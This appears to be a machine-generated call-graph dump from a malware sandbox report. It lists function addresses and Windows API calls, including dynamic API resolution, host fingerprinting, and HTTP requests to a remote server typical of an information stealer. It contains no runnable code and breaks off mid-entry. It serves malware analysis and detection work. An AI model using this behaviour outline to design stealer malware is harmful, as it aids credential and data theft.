14351 1435be 14350->14351 14352 1445c0 2 API calls 14351->14352 14353 1435d7 14352->14353 14354 1445c0 2 API calls 14353->14354 14355 1435f0 14354->14355 14356 1445c0 2 API calls 14355->14356 14357 143609 14356->14357 14358 1445c0 2 API calls 14357->14358 14359 143622 14358->14359 14360 1445c0 2 API calls 14359->14360 14361 14363b 14360->14361 14362 1445c0 2 API calls 14361->14362 14363 143654 14362->14363 14364 1445c0 2 API calls 14363->14364 14365 14366d 14364->14365 14366 1445c0 2 API calls 14365->14366 14367 143686 14366->14367 14368 1445c0 2 API calls 14367->14368 14369 14369f 14368->14369 14370 1445c0 2 API calls 14369->14370 14371 1436b8 14370->14371 14372 1445c0 2 API calls 14371->14372 14373 1436d1 14372->14373 14374 1445c0 2 API calls 14373->14374 14375 1436ea 14374->14375 14376 1445c0 2 API calls 14375->14376 14377 143703 14376->14377 14378 1445c0 2 API calls 14377->14378 14379 14371c 14378->14379 14380 1445c0 2 API calls 14379->14380 14381 143735 14380->14381 14382 1445c0 2 API calls 14381->14382 14383 14374e 14382->14383 14384 1445c0 2 API calls 14383->14384 14385 143767 14384->14385 14386 1445c0 2 API calls 14385->14386 14387 143780 14386->14387 14388 1445c0 2 API calls 14387->14388 14389 143799 14388->14389 14390 1445c0 2 API calls 14389->14390 14391 1437b2 14390->14391 14392 1445c0 2 API calls 14391->14392 14393 1437cb 14392->14393 14394 1445c0 2 API calls 14393->14394 14395 1437e4 14394->14395 14396 1445c0 2 API calls 14395->14396 14397 1437fd 14396->14397 14398 1445c0 2 API calls 14397->14398 14399 143816 14398->14399 14400 1445c0 2 API calls 14399->14400 14401 14382f 14400->14401 14402 1445c0 2 API calls 14401->14402 14403 143848 14402->14403 14404 1445c0 2 API calls 14403->14404 14405 143861 14404->14405 14406 1445c0 2 API calls 14405->14406 14407 14387a 14406->14407 14408 1445c0 2 API calls 14407->14408 14409 143893 14408->14409 14410 1445c0 2 API calls 14409->14410 14411 1438ac 14410->14411 14412 1445c0 2 API calls 14411->14412 14413 1438c5 14412->14413 14414 1445c0 2 API calls 14413->14414 14415 1438de 14414->14415 14416 1445c0 2 API calls 14415->14416 14417 1438f7 14416->14417 14418 1445c0 2 API calls 14417->14418 14419 143910 14418->14419 14420 1445c0 2 API calls 14419->14420 14421 143929 14420->14421 14422 1445c0 2 API calls 14421->14422 14423 143942 14422->14423 14424 1445c0 2 API calls 14423->14424 14425 14395b 14424->14425 14426 1445c0 2 API calls 14425->14426 14427 143974 14426->14427 14428 1445c0 2 API calls 14427->14428 14429 14398d 14428->14429 14430 1445c0 2 API calls 14429->14430 14431 1439a6 14430->14431 14432 1445c0 2 API calls 14431->14432 14433 1439bf 14432->14433 14434 1445c0 2 API calls 14433->14434 14435 1439d8 14434->14435 14436 1445c0 2 API calls 14435->14436 14437 1439f1 14436->14437 14438 1445c0 2 API calls 14437->14438 14439 143a0a 14438->14439 14440 1445c0 2 API calls 14439->14440 14441 143a23 14440->14441 14442 1445c0 2 API calls 14441->14442 14443 143a3c 14442->14443 14444 1445c0 2 API calls 14443->14444 14445 143a55 14444->14445 14446 1445c0 2 API calls 14445->14446 14447 143a6e 14446->14447 14448 1445c0 2 API calls 14447->14448 14449 143a87 14448->14449 14450 1445c0 2 API calls 14449->14450 14451 143aa0 14450->14451 14452 1445c0 2 API calls 14451->14452 14453 143ab9 14452->14453 14454 1445c0 2 API calls 14453->14454 14455 143ad2 14454->14455 14456 1445c0 2 API calls 14455->14456 14457 143aeb 14456->14457 14458 1445c0 2 API calls 14457->14458 14459 143b04 14458->14459 14460 1445c0 2 API calls 14459->14460 14461 143b1d 14460->14461 14462 1445c0 2 API calls 14461->14462 14463 143b36 14462->14463 14464 1445c0 2 API calls 14463->14464 14465 143b4f 14464->14465 14466 1445c0 2 API calls 14465->14466 14467 143b68 14466->14467 14468 1445c0 2 API calls 14467->14468 14469 143b81 14468->14469 14470 1445c0 2 API calls 14469->14470 14471 143b9a 14470->14471 14472 1445c0 2 API calls 14471->14472 14473 143bb3 14472->14473 14474 1445c0 2 API calls 14473->14474 14475 143bcc 14474->14475 14476 1445c0 2 API calls 14475->14476 14477 143be5 14476->14477 14478 1445c0 2 API calls 14477->14478 14479 143bfe 14478->14479 14480 1445c0 2 API calls 14479->14480 14481 143c17 14480->14481 14482 1445c0 2 API calls 14481->14482 14483 143c30 14482->14483 14484 1445c0 2 API calls 14483->14484 14485 143c49 14484->14485 14486 1445c0 2 API calls 14485->14486 14487 143c62 14486->14487 14488 1445c0 2 API calls 14487->14488 14489 143c7b 14488->14489 14490 1445c0 2 API calls 14489->14490 14491 143c94 14490->14491 14492 1445c0 2 API calls 14491->14492 14493 143cad 14492->14493 14494 1445c0 2 API calls 14493->14494 14495 143cc6 14494->14495 14496 1445c0 2 API calls 14495->14496 14497 143cdf 14496->14497 14498 1445c0 2 API calls 14497->14498 14499 143cf8 14498->14499 14500 1445c0 2 API calls 14499->14500 14501 143d11 14500->14501 14502 1445c0 2 API calls 14501->14502 14503 143d2a 14502->14503 14504 1445c0 2 API calls 14503->14504 14505 143d43 14504->14505 14506 1445c0 2 API calls 14505->14506 14507 143d5c 14506->14507 14508 1445c0 2 API calls 14507->14508 14509 143d75 14508->14509 14510 1445c0 2 API calls 14509->14510 14511 143d8e 14510->14511 14512 1445c0 2 API calls 14511->14512 14513 143da7 14512->14513 14514 1445c0 2 API calls 14513->14514 14515 143dc0 14514->14515 14516 1445c0 2 API calls 14515->14516 14517 143dd9 14516->14517 14518 1445c0 2 API calls 14517->14518 14519 143df2 14518->14519 14520 1445c0 2 API calls 14519->14520 14521 143e0b 14520->14521 14522 1445c0 2 API calls 14521->14522 14523 143e24 14522->14523 14524 1445c0 2 API calls 14523->14524 14525 143e3d 14524->14525 14526 1445c0 2 API calls 14525->14526 14527 143e56 14526->14527 14528 1445c0 2 API calls 14527->14528 14529 143e6f 14528->14529 14530 1445c0 2 API calls 14529->14530 14531 143e88 14530->14531 14532 1445c0 2 API calls 14531->14532 14533 143ea1 14532->14533 14534 1445c0 2 API calls 14533->14534 14535 143eba 14534->14535 14536 1445c0 2 API calls 14535->14536 14537 143ed3 14536->14537 14538 1445c0 2 API calls 14537->14538 14539 143eec 14538->14539 14540 1445c0 2 API calls 14539->14540 14541 143f05 14540->14541 14542 1445c0 2 API calls 14541->14542 14543 143f1e 14542->14543 14544 1445c0 2 API calls 14543->14544 14545 143f37 14544->14545 14546 1445c0 2 API calls 14545->14546 14547 143f50 14546->14547 14548 1445c0 2 API calls 14547->14548 14549 143f69 14548->14549 14550 1445c0 2 API calls 14549->14550 14551 143f82 14550->14551 14552 1445c0 2 API calls 14551->14552 14553 143f9b 14552->14553 14554 1445c0 2 API calls 14553->14554 14555 143fb4 14554->14555 14556 1445c0 2 API calls 14555->14556 14557 143fcd 14556->14557 14558 1445c0 2 API calls 14557->14558 14559 143fe6 14558->14559 14560 1445c0 2 API calls 14559->14560 14561 143fff 14560->14561 14562 1445c0 2 API calls 14561->14562 14563 144018 14562->14563 14564 1445c0 2 API calls 14563->14564 14565 144031 14564->14565 14566 1445c0 2 API calls 14565->14566 14567 14404a 14566->14567 14568 1445c0 2 API calls 14567->14568 14569 144063 14568->14569 14570 1445c0 2 API calls 14569->14570 14571 14407c 14570->14571 14572 1445c0 2 API calls 14571->14572 14573 144095 14572->14573 14574 1445c0 2 API calls 14573->14574 14575 1440ae 14574->14575 14576 1445c0 2 API calls 14575->14576 14577 1440c7 14576->14577 14578 1445c0 2 API calls 14577->14578 14579 1440e0 14578->14579 14580 1445c0 2 API calls 14579->14580 14581 1440f9 14580->14581 14582 1445c0 2 API calls 14581->14582 14583 144112 14582->14583 14584 1445c0 2 API calls 14583->14584 14585 14412b 14584->14585 14586 1445c0 2 API calls 14585->14586 14587 144144 14586->14587 14588 1445c0 2 API calls 14587->14588 14589 14415d 14588->14589 14590 1445c0 2 API calls 14589->14590 14591 144176 14590->14591 14592 1445c0 2 API calls 14591->14592 14593 14418f 14592->14593 14594 1445c0 2 API calls 14593->14594 14595 1441a8 14594->14595 14596 1445c0 2 API calls 14595->14596 14597 1441c1 14596->14597 14598 1445c0 2 API calls 14597->14598 14599 1441da 14598->14599 14600 1445c0 2 API calls 14599->14600 14601 1441f3 14600->14601 14602 1445c0 2 API calls 14601->14602 14603 14420c 14602->14603 14604 1445c0 2 API calls 14603->14604 14605 144225 14604->14605 14606 1445c0 2 API calls 14605->14606 14607 14423e 14606->14607 14608 1445c0 2 API calls 14607->14608 14609 144257 14608->14609 14610 1445c0 2 API calls 14609->14610 14611 144270 14610->14611 14612 1445c0 2 API calls 14611->14612 14613 144289 14612->14613 14614 1445c0 2 API calls 14613->14614 14615 1442a2 14614->14615 14616 1445c0 2 API calls 14615->14616 14617 1442bb 14616->14617 14618 1445c0 2 API calls 14617->14618 14619 1442d4 14618->14619 14620 1445c0 2 API calls 14619->14620 14621 1442ed 14620->14621 14622 1445c0 2 API calls 14621->14622 14623 144306 14622->14623 14624 1445c0 2 API calls 14623->14624 14625 14431f 14624->14625 14626 1445c0 2 API calls 14625->14626 14627 144338 14626->14627 14628 1445c0 2 API calls 14627->14628 14629 144351 14628->14629 14630 1445c0 2 API calls 14629->14630 14631 14436a 14630->14631 14632 1445c0 2 API calls 14631->14632 14633 144383 14632->14633 14634 1445c0 2 API calls 14633->14634 14635 14439c 14634->14635 14636 1445c0 2 API calls 14635->14636 14637 1443b5 14636->14637 14638 1445c0 2 API calls 14637->14638 14639 1443ce 14638->14639 14640 1445c0 2 API calls 14639->14640 14641 1443e7 14640->14641 14642 1445c0 2 API calls 14641->14642 14643 144400 14642->14643 14644 1445c0 2 API calls 14643->14644 14645 144419 14644->14645 14646 1445c0 2 API calls 14645->14646 14647 144432 14646->14647 14648 1445c0 2 API calls 14647->14648 14649 14444b 14648->14649 14650 1445c0 2 API calls 14649->14650 14651 144464 14650->14651 14652 1445c0 2 API calls 14651->14652 14653 14447d 14652->14653 14654 1445c0 2 API calls 14653->14654 14655 144496 14654->14655 14656 1445c0 2 API calls 14655->14656 14657 1444af 14656->14657 14658 1445c0 2 API calls 14657->14658 14659 1444c8 14658->14659 14660 1445c0 2 API calls 14659->14660 14661 1444e1 14660->14661 14662 1445c0 2 API calls 14661->14662 14663 1444fa 14662->14663 14664 1445c0 2 API calls 14663->14664 14665 144513 14664->14665 14666 1445c0 2 API calls 14665->14666 14667 14452c 14666->14667 14668 1445c0 2 API calls 14667->14668 14669 144545 14668->14669 14670 1445c0 2 API calls 14669->14670 14671 14455e 14670->14671 14672 1445c0 2 API calls 14671->14672 14673 144577 14672->14673 14674 1445c0 2 API calls 14673->14674 14675 144590 14674->14675 14676 1445c0 2 API calls 14675->14676 14677 1445a9 14676->14677 14678 159c10 14677->14678 14679 15a036 8 API calls 14678->14679 14680 159c20 43 API calls 14678->14680 14681 15a146 14679->14681 14682 15a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14679->14682 14680->14679 14683 15a216 14681->14683 14684 15a153 8 API calls 14681->14684 14682->14681 14685 15a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14683->14685 14686 15a298 14683->14686 14684->14683 14685->14686 14687 15a2a5 6 API calls 14686->14687 14688 15a337 14686->14688 14687->14688 14689 15a344 9 API calls 14688->14689 14690 15a41f 14688->14690 14689->14690 14691 15a4a2 14690->14691 14692 15a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14690->14692 14693 15a4dc 14691->14693 14694 15a4ab GetProcAddress GetProcAddress 14691->14694 14692->14691 14695 15a515 14693->14695 14696 15a4e5 GetProcAddress GetProcAddress 14693->14696 14694->14693 14697 15a612 14695->14697 14698 15a522 10 API calls 14695->14698 14696->14695 14699 15a67d 14697->14699 14700 15a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14697->14700 14698->14697 14701 15a686 GetProcAddress 14699->14701 14702 15a69e 14699->14702 14700->14699 14701->14702 14703 15a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14702->14703 14704 155ca3 14702->14704 14703->14704 14705 141590 14704->14705 15826 141670 14705->15826 14708 15a7a0 lstrcpy 14709 1415b5 14708->14709 14710 15a7a0 lstrcpy 14709->14710 14711 1415c7 14710->14711 14712 15a7a0 lstrcpy 14711->14712 14713 1415d9 14712->14713 14714 15a7a0 lstrcpy 14713->14714 14715 141663 14714->14715 14716 155510 14715->14716 14717 155521 14716->14717 14718 15a820 2 API calls 14717->14718 14719 15552e 14718->14719 14720 15a820 2 API calls 14719->14720 14721 15553b 14720->14721 14722 15a820 2 API calls 14721->14722 14723 155548 14722->14723 14724 15a740 lstrcpy 14723->14724 14725 155555 14724->14725 14726 15a740 lstrcpy 14725->14726 14727 155562 14726->14727 14728 15a740 lstrcpy 14727->14728 14729 15556f 14728->14729 14730 15a740 lstrcpy 14729->14730 14751 15557c 14730->14751 14731 15a740 lstrcpy 14731->14751 14732 15a7a0 lstrcpy 14732->14751 14733 155643 StrCmpCA 14733->14751 14734 1556a0 StrCmpCA 14735 1557dc 14734->14735 14734->14751 14736 15a8a0 lstrcpy 14735->14736 14737 1557e8 14736->14737 14738 15a820 2 API calls 14737->14738 14740 1557f6 14738->14740 14739 15a820 lstrlen lstrcpy 14739->14751 14743 15a820 2 API calls 14740->14743 14741 155856 StrCmpCA 14744 155991 14741->14744 14741->14751 14742 1551f0 20 API calls 14742->14751 14746 155805 14743->14746 14745 15a8a0 lstrcpy 14744->14745 14747 15599d 14745->14747 14748 141670 lstrcpy 14746->14748 14750 15a820 2 API calls 14747->14750 14770 155811 14748->14770 14749 141590 lstrcpy 14749->14751 14752 1559ab 14750->14752 14751->14731 14751->14732 14751->14733 14751->14734 14751->14739 14751->14741 14751->14742 14751->14749 14753 155a0b StrCmpCA 14751->14753 14754 1552c0 25 API calls 14751->14754 14760 15a8a0 lstrcpy 14751->14760 14766 15578a StrCmpCA 14751->14766 14769 15593f StrCmpCA 14751->14769 14755 15a820 2 API calls 14752->14755 14756 155a16 Sleep 14753->14756 14757 155a28 14753->14757 14754->14751 14758 1559ba 14755->14758 14756->14751 14759 15a8a0 lstrcpy 14757->14759 14761 141670 lstrcpy 14758->14761 14762 155a34 14759->14762 14760->14751 14761->14770 14763 15a820 2 API calls 14762->14763 14764 155a43 14763->14764 14765 15a820 2 API calls 14764->14765 14767 155a52 14765->14767 14766->14751 14768 141670 lstrcpy 14767->14768 14768->14770 14769->14751 14770->13823 14772 157553 GetVolumeInformationA 14771->14772 14773 15754c 14771->14773 14774 157591 14772->14774 14773->14772 14775 1575fc GetProcessHeap RtlAllocateHeap 14774->14775 14776 157619 14775->14776 14777 157628 wsprintfA 14775->14777 14779 15a740 lstrcpy 14776->14779 14778 15a740 lstrcpy 14777->14778 14780 155da7 14778->14780 14779->14780 14780->13844 14782 15a7a0 lstrcpy 14781->14782 14783 144899 14782->14783 15835 1447b0 14783->15835 14785 1448a5 14786 15a740 lstrcpy 14785->14786 14787 1448d7 14786->14787 14788 15a740 lstrcpy 14787->14788 14789 1448e4 14788->14789 14790 15a740 lstrcpy 14789->14790 14791 1448f1 14790->14791 14792 15a740 lstrcpy 14791->14792 14793 1448fe 14792->14793 14794 15a740 lstrcpy 14793->14794 14795 14490b InternetOpenA StrCmpCA 14794->14795 14796 144944 14795->14796 14797 144ecb InternetCloseHandle 14796->14797 15841 158b60 14796->15841 14799 144ee8 14797->14799 15856 149ac0 CryptStringToBinaryA 14799->15856 14800 144963 15849 15a920 14800->15849 14803 144976 14805 15a8a0 lstrcpy 14803->14805 14810 14497f 14805->14810 14806 15a820 2 API calls 14807 144f05 14806->14807 14809 15a9b0 4 API calls 14807->14809 14808 144f27 ctype 14813 15a7a0 lstrcpy 14808->14813 14811 144f1b 14809->14811 14814 15a9b0 4 API calls 14810->14814 14812 15a8a0 lstrcpy 14811->14812 14812->14808 14825 144f57 14813->14825 14815 1449a9 14814->14815 14816 15a8a0 lstrcpy 14815->14816 14817 1449b2 14816->14817 14818 15a9b0 4 API calls 14817->14818 14819 1449d1 14818->14819 14820 15a8a0 lstrcpy 14819->14820 14821 1449da 14820->14821 14822 15a920 3 API calls 14821->14822 14823 1449f8 14822->14823 14824 15a8a0 lstrcpy 14823->14824 14826 144a01 14824->14826 14825->13847 14827 15a9b0 4 API calls 14826->14827 14828 144a20 14827->14828 14829 15a8a0 lstrcpy 14828->14829 14830 144a29 14829->14830 14831 15a9b0 4 API calls 14830->14831 14832 144a48 14831->14832 14833 15a8a0 lstrcpy 14832->14833 14834 144a51 14833->14834 14835 15a9b0 4 API calls 14834->14835 14836 144a7d 14835->14836 14837 15a920 3 API calls 14836->14837 14838 144a84 14837->14838 14839 15a8a0 lstrcpy 14838->14839 14840 144a8d 14839->14840 14841 144aa3 InternetConnectA 14840->14841 14841->14797 14842 144ad3 HttpOpenRequestA 14841->14842 14844 144ebe InternetCloseHandle 14842->14844 14845 144b28 14842->14845 14844->14797 14846 15a9b0 4 API calls 14845->14846 14847 144b3c 14846->14847 14848 15a8a0 lstrcpy 14847->14848 14849 144b45 14848->14849 14850 15a920 3 API calls 14849->14850 14851 144b63 14850->14851 14852 15a8a0 lstrcpy 14851->14852 14853 144b6c 14852->14853 14854 15a9b0 4 API calls 14853->14854 14855 144b8b 14854->14855 14856 15a8a0 lstrcpy 14855->14856 14857 144b94 14856->14857 14858 15a9b0 4 API calls 14857->14858 14859 144bb5 14858->14859 14860 15a8a0 lstrcpy 14859->14860 14861 144bbe 14860->14861 14862 15a9b0 4 API calls 14861->14862 14863 144bde 14862->14863 14864 15a8a0 lstrcpy 14863->14864 14865 144be7 14864->14865 14866 15a9b0 4 API calls 14865->14866 14867 144c06 14866->14867 14868 15a8a0 lstrcpy 14867->14868 14869 144c0f 14868->14869 14870 15a920 3 API calls 14869->14870 14871 144c2d 14870->14871 14872 15a8a0 lstrcpy 14871->14872 14873 144c36 14872->14873 14874 15a9b0 4 API calls 14873->14874 14875 144c55 14874->14875 14876 15a8a0 lstrcpy 14875->14876 14877 144c5e 14876->14877 14878 15a9b0 4 API calls 14877->14878 14879 144c7d 14878->14879 14880 15a8a0 lstrcpy 14879->14880 14881 144c86 14880->14881 14882 15a920 3 API calls 14881->14882 14883 144ca4 14882->14883 14884 15a8a0 lstrcpy 14883->14884 14885 144cad 14884->14885 14886 15a9b0 4 API calls 14885->14886 14887 144ccc 14886->14887 14888 15a8a0 lstrcpy 14887->14888 14889 144cd5 14888->14889 14890 15a9b0 4 API calls 14889->14890 14891 144cf6 14890->14891 14892 15a8a0 lstrcpy 14891->14892 14893 144cff 14892->14893 14894 15a9b0 4 API calls 14893->14894 14895 144d1f 14894->14895 14896 15a8a0 lstrcpy 14895->14896 14897 144d28 14896->14897 14898 15a9b0 4 API calls 14897->14898 14899 144d47 14898->14899 14900 15a8a0 lstrcpy 14899->14900 14901 144d50 14900->14901 14902 15a920 3 API calls 14901->14902 14903 144d6e 14902->14903 14904 15a8a0 lstrcpy 14903->14904 14905 144d77 14904->14905 14906 15a740 lstrcpy 14905->14906 14907 144d92 14906->14907 14908 15a920 3 API calls 14907->14908 14909 144db3 14908->14909 14910 15a920 3 API calls 14909->14910 14911 144dba 14910->14911 14912 15a8a0 lstrcpy 14911->14912 14913 144dc6 14912->14913 14914 144de7 lstrlen 14913->14914 14915 144dfa 14914->14915 14916 144e03 lstrlen 14915->14916 15855 15aad0 14916->15855 14918 144e13 HttpSendRequestA 14919 144e32 InternetReadFile 14918->14919 14920 144e67 InternetCloseHandle 14919->14920 14925 144e5e 14919->14925 14922 15a800 14920->14922 14922->14844 14923 15a9b0 4 API calls 14923->14925 14924 15a8a0 lstrcpy 14924->14925 14925->14919 14925->14920 14925->14923 14925->14924 15862 15aad0 14926->15862 14928 1517c4 StrCmpCA 14929 1517cf ExitProcess 14928->14929 14931 1517d7 14928->14931 14930 1519c2 14930->13849 14931->14930 14932 1518f1 StrCmpCA 14931->14932 14933 151951 StrCmpCA 14931->14933 14934 151970 StrCmpCA 14931->14934 14935 151913 StrCmpCA 14931->14935 14936 151932 StrCmpCA 14931->14936 14937 15185d StrCmpCA 14931->14937 14938 15187f StrCmpCA 14931->14938 14939 1518ad StrCmpCA 14931->14939 14940 1518cf StrCmpCA 14931->14940 14941 15a820 lstrlen lstrcpy 14931->14941 14932->14931 14933->14931 14934->14931 14935->14931 14936->14931 14937->14931 14938->14931 14939->14931 14940->14931 14941->14931 14943 15a7a0 lstrcpy 14942->14943 14944 145979 14943->14944 14945 1447b0 2 API calls 14944->14945 14946 145985 14945->14946 14947 15a740 lstrcpy 14946->14947 14948 1459ba 14947->14948 14949 15a740 lstrcpy 14948->14949 14950 1459c7 14949->14950 14951 15a740 lstrcpy 14950->14951 14952 1459d4 14951->14952 14953 15a740 lstrcpy 14952->14953 14954 1459e1 14953->14954 14955 15a740 lstrcpy 14954->14955 14956 1459ee InternetOpenA StrCmpCA 14955->14956 14957 145a1d 14956->14957 14958 145fc3 InternetCloseHandle 14957->14958 14959 158b60 3 API calls 14957->14959 14961 145fe0 14958->14961 14960 145a3c 14959->14960 14962 15a920 3 API calls 14960->14962 14963 149ac0 4 API calls 14961->14963 14964 145a4f 14962->14964 14965 145fe6 14963->14965 14966 15a8a0 lstrcpy 14964->14966 14967 15a820 2 API calls 14965->14967 14969 14601f ctype 14965->14969 14971 145a58 14966->14971 14968 145ffd 14967->14968 14970 15a9b0 4 API calls 14968->14970 14973 15a7a0 lstrcpy 14969->14973 14972 146013 14970->14972 14975 15a9b0 4 API calls 14971->14975 14974 15a8a0 lstrcpy 14972->14974 14983 14604f 14973->14983 14974->14969 14976 145a82 14975->14976 14977 15a8a0 lstrcpy 14976->14977 14978 145a8b 14977->14978 14979 15a9b0 4 API calls 14978->14979 14980 145aaa 14979->14980 14981 15a8a0 lstrcpy 14980->14981 14982 145ab3 14981->14982 14984 15a920 3 API calls 14982->14984 14983->13855 14985 145ad1 14984->14985 14986 15a8a0 lstrcpy 14985->14986 14987 145ada 14986->14987 14988 15a9b0 4 API calls 14987->14988 14989 145af9 14988->14989 14990 15a8a0 lstrcpy 14989->14990 14991 145b02 14990->14991 14992 15a9b0 4 API calls 14991->14992 14993 145b21 14992->14993 14994 15a8a0 lstrcpy 14993->14994 14995 145b2a 14994->14995 14996 15a9b0 4 API calls 14995->14996 14997 145b56 14996->14997 14998 15a920 3 API calls 14997->14998 14999 145b5d 14998->14999 15000 15a8a0 lstrcpy 14999->15000 15001 145b66 15000->15001 15002 145b7c InternetConnectA 15001->15002 15002->14958 15003 145bac HttpOpenRequestA 15002->15003 15005 145fb6 InternetCloseHandle 15003->15005 15006 145c0b 15003->15006 15005->14958 15007 15a9b0 4 API calls 15006->15007 15008 145c1f 15007->15008 15009 15a8a0 lstrcpy 15008->15009 15010 145c28 15009->15010 15011 15a920 3 API calls 15010->15011 15012 145c46 15011->15012 15013 15a8a0 lstrcpy 15012->15013 15014 145c4f 15013->15014 15015 15a9b0 4 API calls 15014->15015 15016 145c6e 15015->15016 15017 15a8a0 lstrcpy 15016->15017 15018 145c77 15017->15018 15019 15a9b0 4 API calls 15018->15019 15020 145c98 15019->15020 15021 15a8a0 lstrcpy 15020->15021 15022 145ca1 15021->15022 15023 15a9b0 4 API calls 15022->15023 15024 145cc1 15023->15024 15025 15a8a0 lstrcpy 15024->15025 15026 145cca 15025->15026 15027 15a9b0 4 API calls 15026->15027 15028 145ce9 15027->15028 15029 15a8a0 lstrcpy 15028->15029 15030 145cf2 15029->15030 15031 15a920 3 API calls 15030->15031 15032 145d10 15031->15032 15033 15a8a0 lstrcpy 15032->15033 15034 145d19 15033->15034 15035 15a9b0 4 API calls 15034->15035 15036 145d38 15035->15036 15037 15a8a0 lstrcpy 15036->15037 15038 145d41 15037->15038 15039 15a9b0 4 API calls 15038->15039 15040 145d60 15039->15040 15041 15a8a0 lstrcpy 15040->15041 15042 145d69 15041->15042 15043 15a920 3 API calls 15042->15043 15044 145d87 15043->15044 15045 15a8a0 lstrcpy 15044->15045 15046 145d90 15045->15046 15047 15a9b0 4 API calls 15046->15047 15048 145daf 15047->15048 15049 15a8a0 lstrcpy 15048->15049 15050 145db8 15049->15050 15051 15a9b0 4 API calls 15050->15051 15052 145dd9 15051->15052 15053 15a8a0 lstrcpy 15052->15053 15054 145de2 15053->15054 15055 15a9b0 4 API calls 15054->15055 15056 145e02 15055->15056 15057 15a8a0 lstrcpy 15056->15057 15058 145e0b 15057->15058 15059 15a9b0 4 API calls 15058->15059 15060 145e2a 15059->15060 15061 15a8a0 lstrcpy 15060->15061 15062 145e33 15061->15062 15063 15a920 3 API calls 15062->15063 15064 145e54 15063->15064 15065 15a8a0 lstrcpy 15064->15065 15066 145e5d 15065->15066 15067 145e70 lstrlen 15066->15067 15863 15aad0 15067->15863 15069 145e81 lstrlen GetProcessHeap RtlAllocateHeap 15864 15aad0 15069->15864 15071 145eae lstrlen 15072 145ebe 15071->15072 15073 145ed7 lstrlen 15072->15073 15074 145ee7 15073->15074 15075 145ef0 lstrlen 15074->15075 15076 145f04 15075->15076 15077 145f1a lstrlen 15076->15077 15865 15aad0 15077->15865 15079 145f2a HttpSendRequestA 15080 145f35 InternetReadFile 15079->15080 15081 145f6a InternetCloseHandle 15080->15081 15085 145f61 15080->15085 15081->15005 15083 15a9b0 4 API calls 15083->15085 15084 15a8a0 lstrcpy 15084->15085 15085->15080 15085->15081 15085->15083 15085->15084 15089 151077 15086->15089 15087 151151 15087->13857 15088 15a820 lstrlen lstrcpy 15088->15089 15089->15087 15089->15088 15095 150db7 15090->15095 15091 150f17 15091->13865 15092 150ea4 StrCmpCA 15092->15095 15093 150e27 StrCmpCA 15093->15095 15094 150e67 StrCmpCA 15094->15095 15095->15091 15095->15092 15095->15093 15095->15094 15096 15a820 lstrlen lstrcpy 15095->15096 15096->15095 15098 150f67 15097->15098 15099 150fb2 StrCmpCA 15098->15099 15100 151044 15098->15100 15101 15a820 lstrlen lstrcpy 15098->15101 15099->15098 15100->13873 15101->15098 15103 15a740 lstrcpy 15102->15103 15104 151a26 15103->15104 15105 15a9b0 4 API calls 15104->15105 15106 151a37 15105->15106 15107 15a8a0 lstrcpy 15106->15107 15108 151a40 15107->15108 15109 15a9b0 4 API calls 15108->15109 15110 151a5b 15109->15110 15111 15a8a0 lstrcpy 15110->15111 15112 151a64 15111->15112 15113 15a9b0 4 API calls 15112->15113 15114 151a7d 15113->15114 15115 15a8a0 lstrcpy 15114->15115 15116 151a86 15115->15116 15117 15a9b0 4 API calls 15116->15117 15118 151aa1 15117->15118 15119 15a8a0 lstrcpy 15118->15119 15120 151aaa 15119->15120 15121 15a9b0 4 API calls 15120->15121 15122 151ac3 15121->15122 15123 15a8a0 lstrcpy 15122->15123 15124 151acc 15123->15124 15125 15a9b0 4 API calls 15124->15125 15126 151ae7 15125->15126 15127 15a8a0 lstrcpy 15126->15127 15128 151af0 15127->15128 15129 15a9b0 4 API calls 15128->15129 15130 151b09 15129->15130 15131 15a8a0 lstrcpy 15130->15131 15132 151b12 15131->15132 15133 15a9b0 4 API calls 15132->15133 15134 151b2d 15133->15134 15135 15a8a0 lstrcpy 15134->15135 15136 151b36 15135->15136 15137 15a9b0 4 API calls 15136->15137 15138 151b4f 15137->15138 15139 15a8a0 lstrcpy 15138->15139 15140 151b58 15139->15140 15141 15a9b0 4 API calls 15140->15141 15142 151b76 15141->15142 15143 15a8a0 lstrcpy 15142->15143 15144 151b7f 15143->15144 15145 157500 6 API calls 15144->15145 15146 151b96 15145->15146 15147 15a920 3 API calls 15146->15147 15148 151ba9 15147->15148 15149 15a8a0 lstrcpy 15148->15149 15150 151bb2 15149->15150 15151 15a9b0 4 API calls 15150->15151 15152 151bdc 15151->15152 15153 15a8a0 lstrcpy 15152->15153 15154 151be5 15153->15154 15155 15a9b0 4 API calls 15154->15155 15156 151c05 15155->15156 15157 15a8a0 lstrcpy 15156->15157 15158 151c0e 15157->15158 15866 157690 GetProcessHeap RtlAllocateHeap 15158->15866 15161 15a9b0 4 API calls 15162 151c2e 15161->15162 15163 15a8a0 lstrcpy 15162->15163 15164 151c37 15163->15164 15165 15a9b0 4 API calls 15164->15165 15166 151c56 15165->15166 15167 15a8a0 lstrcpy 15166->15167 15168 151c5f 15167->15168 15169 15a9b0 4 API calls 15168->15169 15170 151c80 15169->15170 15171 15a8a0 lstrcpy 15170->15171 15172 151c89 15171->15172 15873 1577c0 GetCurrentProcess IsWow64Process 15172->15873 15175 15a9b0 4 API calls 15176 151ca9 15175->15176 15177 15a8a0 lstrcpy 15176->15177 15178 151cb2 15177->15178 15179 15a9b0 4 API calls 15178->15179 15180 151cd1 15179->15180 15181 15a8a0 lstrcpy 15180->15181 15182 151cda 15181->15182 15183 15a9b0 4 API calls 15182->15183 15184 151cfb 15183->15184 15185 15a8a0 lstrcpy 15184->15185 15186 151d04 15185->15186 15187 157850 3 API calls 15186->15187 15188 151d14 15187->15188 15189 15a9b0 4 API calls 15188->15189 15190 151d24 15189->15190 15191 15a8a0 lstrcpy 15190->15191 15192 151d2d 15191->15192 15193 15a9b0 4 API calls 15192->15193 15194 151d4c 15193->15194 15195 15a8a0 lstrcpy 15194->15195 15196 151d55 15195->15196 15197 15a9b0 4 API calls 15196->15197 15198 151d75 15197->15198 15199 15a8a0 lstrcpy 15198->15199 15200 151d7e 15199->15200 15201 1578e0 3 API calls 15200->15201 15202 151d8e 15201->15202 15203 15a9b0 4 API calls 15202->15203 15204 151d9e 15203->15204 15205 15a8a0 lstrcpy 15204->15205 15206 151da7 15205->15206 15207 15a9b0 4 API calls 15206->15207 15208 151dc6 15207->15208 15209 15a8a0 lstrcpy 15208->15209 15210 151dcf 15209->15210 15211 15a9b0 4 